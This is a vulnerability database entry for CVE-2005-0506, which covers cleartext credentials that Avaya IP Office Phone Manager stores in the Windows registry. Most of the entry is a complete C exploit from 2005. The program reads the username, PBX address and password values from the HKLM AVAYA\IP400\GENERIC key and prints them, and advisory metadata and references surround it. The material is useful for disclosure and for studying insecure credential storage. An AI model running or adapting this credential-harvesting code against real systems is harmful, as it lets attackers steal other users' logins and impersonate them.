Avaya Sensitive Information Disclosure Vulnerability

Vulnerability ID: 1108483
Vulnerability type: Unknown
Published: 2005-02-24
Updated: 2005-03-14
CVE ID: CVE-2005-0506
CNNVD-ID: CNNVD-200503-108
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/839
https://www.securityfocus.com/bid/90226
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-108
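|Vulnerability details
Avaya IP Office Phone Manager, IP Softphone and other products store sensitive data in cleartext in registry keys. Local and possibly remote users can steal usernames and passwords through keys such as Avaya\IP400\Generic and impersonate other users.
|Exploit (EXP)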
#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
    Filename:    exploit.c
    Title:       Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01
    Author:      pagvac (Adrian Pastor)
    Date:        24th Feb, 2005
    Other info:  tested on version 2.013. Compile as a Win32 console application project in Visual C++
*/

/*
    Reads one string value from HKLM\SOFTWARE\AVAYA\IP400\GENERIC into lszValData.
    Returns TRUE only if the key was opened and the value was read.
*/
BOOL QueryVal(const char *lszVal2Query, char lszValData[255])
{
    char lszResult[255];
    HKEY hKey;
    LONG returnStatus;
    DWORD dwType = REG_SZ;
    DWORD dwSize = sizeof(lszResult) - 1;   /* leave room for a terminating NUL */

    /* ANSI variants are used explicitly because the arguments are char strings */
    returnStatus = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;   /* hKey is not valid here, so there is nothing to close */

    returnStatus = RegQueryValueExA(hKey, lszVal2Query, NULL, &dwType, (LPBYTE)lszResult, &dwSize);
    RegCloseKey(hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;   /* value missing or not readable */

    /* Registry strings are not guaranteed to be NUL-terminated */
    lszResult[dwSize] = '\0';
    strcpy(lszValData, lszResult);
    return TRUE;
}

int main(void)
{
    char valData[255];

    printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n");
    printf("By pagvac (Adrian Pastor)\n");
    printf("Tested on version 2.013\n\n");

    // Print username
    printf("Username:\t");
    if (!QueryVal("UserName", valData))
        printf("Error! No permissions to read key value?\n");
    else
        printf("%s\n", valData);

    // Print IP address
    printf("PBX IP Address:\t");
    if (!QueryVal("PBXAddress", valData))
        printf("Error! No permissions to read key value?\n");
    else
        printf("%s\n", valData);

    // Print password
    printf("Password:\t");
    if (!QueryVal("Password", valData))
        printf("Error! No permissions to read key value?\n");
    else
    {
        if (strcmp(valData, "") == 0)
            printf("[blank password]\n\n");
        else
        {
            printf("%s\n", valData);
            printf("Password obfuscated?\n\n");
        }
    }

    return 0;
}

// milw0rm.com [2005-02-24]
|Affected products
Avaya IP Softphone 0
|References

Source: support.avaya.com
Link: http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_Leak.pdf
Source: BUGTRAQ
Name: 20050222 Re: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110910486128709&w=2
Source: BUGTRAQ
Name: 20050222 Avaya IP Office Phone Manager - Sensitive Information Cleartext
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110909733831694&w=2